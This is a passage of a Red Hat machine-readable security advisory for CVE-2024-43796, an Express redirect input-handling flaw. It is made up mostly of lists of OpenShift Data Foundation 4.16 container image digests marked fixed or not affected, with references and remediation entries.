"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", 